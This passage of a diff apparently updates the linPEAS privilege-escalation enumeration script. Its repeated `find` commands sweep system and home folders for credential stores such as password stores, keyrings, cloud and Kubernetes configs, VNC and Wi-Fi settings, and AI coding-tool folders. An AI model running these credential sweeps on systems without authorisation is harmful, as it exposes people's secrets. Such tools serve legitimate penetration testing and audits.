\"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter @@ -703,179 +741,182 @@ elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | g printf $GREEN"Caching directories "$NC CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -type d -name \"mysql\" -o -name \"bind\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"kube-proxy\" -o -name \"kubelet\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"pam.d\" -o -name \"system-connections\" -o -name \"cacti\" -o -name \"system.d\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"kubernetes\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -type d -name \"mysql\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -type d -name \"mysql\" -o -name \"bind\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -type d -name \"mysql\" -o -name \"bind\" -o -name \".docker\" -o -name \"legacy_credentials\" -o -name \".password-store\" -o -name \"ErrorRecords\" -o -name \".irssi\" -o -name \"ipa\" -o -name \"environments\" -o -name \"doctl\" -o -name \"seeddms*\" -o -name \"dirsrv\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"gcloud\" -o -name \"logstash\" -o -name \".cloudflared\" -o -name \"concourse-auth\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \".svn\" -o -name \"*jenkins\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \"Google Cloud Directory Sync\" -o -name \"kube-proxy\" -o -name \"kubelet\" -o -name \"couchdb\" -o -name \"Google Password Sync\" -o -name \"keyrings\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \".kube*\" -o -name \"filezilla\" -o -name \"zabbix\" -o -name \"nginx\" -o -name \"kubernetes\" -o -name \"sentry\" -o -name \".vnc\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"kubelet\" -o -name \"Google Cloud Directory Sync\" -o -name \"gh\" -o -name \"session.d\" -o -name \"logstash\" -o -name \"bind\" -o -name \"couchdb\" -o -name \"kube-proxy\" -o -name \"sentry\" -o -name \"system-connections\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \"system.d\" -o -name \".cloudflared\" -o -name \"kubernetes\" -o -name \"neo4j\" -o -name \"system-local.d\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"pam.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \"wpa_supplicant\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o 